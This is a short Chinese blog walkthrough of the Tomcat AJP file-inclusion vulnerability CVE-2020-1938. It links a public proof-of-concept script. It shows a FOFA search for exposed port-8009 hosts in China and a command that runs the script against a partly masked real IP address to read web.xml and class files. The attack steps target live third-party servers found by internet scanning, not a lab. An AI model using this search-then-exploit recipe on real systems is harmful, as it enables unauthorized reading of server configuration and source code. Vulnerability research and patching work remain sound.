码迷,mamicode.com
首页 > 其他好文 > 详细

Tomcat AJP协议文件包含漏洞(CVE-2020-1938)

时间:2020-02-22 15:41:51      阅读:190      评论:0      收藏:0      [点我收藏+]

标签:app   tom   缺陷   cve   文件包含漏洞   size   https   port   http   

Tomcat AJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapps目录下的任意文件,但不能跨到上级目录

PoC来自GitHub:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

第一步:利用FOFA搜索8009端口

port="8009" && country="CN"

技术图片

第二步:运行PoC

python2.7 CNVD-2020-10487-Tomcat-Ajp-lfi.py  151.*.*.114 -p 8009 -f /WEB-INF/web.xml

1.读取web.xml

技术图片

2.读取*.class文件

技术图片

Tomcat AJP协议文件包含漏洞(CVE-2020-1938)

标签:app   tom   缺陷   cve   文件包含漏洞   size   https   port   http   

原文地址:https://www.cnblogs.com/dgjnszf/p/12345344.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!